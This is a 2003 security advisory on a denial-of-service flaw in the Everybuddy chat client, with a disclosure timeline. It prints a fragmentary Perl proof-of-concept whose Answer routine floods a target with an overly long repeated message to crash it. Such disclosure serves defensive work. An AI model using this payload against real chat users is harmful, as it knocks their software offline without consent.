Everybuddy Vulnerable to a DoS Attack (Long Message)
5 Aug. 2003
Summary
Everybuddy has support for AIM, ICQ, MSN, Yahoo! and Jabber chat programs, the program contains a security vulnerability that allows remote attackers to cause the program to crash by sending it an overly long message (instant message).
sub Status {
my ($self, $username, $newstatus) = @_;
print "Status() called with parameters:\n";
print " " . join(",", @_), "\n";
# Print the status change info.
print "${username}'s status changed from " . $self->buddystatus($username) . " to $newstatus.\n";
# Initiate the call.
$self->call($username);
# The call may take a few seconds to complete, so we can't
# immediately send messages. Let's put the message in a
# FIFO (queue) that is keyed by username.
push (@{$queue{$username}}, "Glad to see you online!");
}
}
sub Message {
my ($self, $username, undef, $msg) = @_;
print "Message() called with parameters:\n";
print " " . join(",", @_), "\n";
}
sub Join {
my ($self, $username) = @_;
print "Join() called with parameters:\n";
print " " . join(",", @_), "\n";
# See if there's anything queued up.
# Deliver each message if there is stuff in the queue for this user.
while ($_ = shift @{$queue{$username}}) {
$$self->sendmsg($_);
}
}
sub Answer {
my ($self, $username) = @_;
print "Answer() called with parameters:\n";
print " " . join(",", @_), "\n";
# Send a hello message.
$$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);
}
Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then disappeared again), we are forced to release this information, without receiving a proper response from them.
Disclosure timeline:
19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory
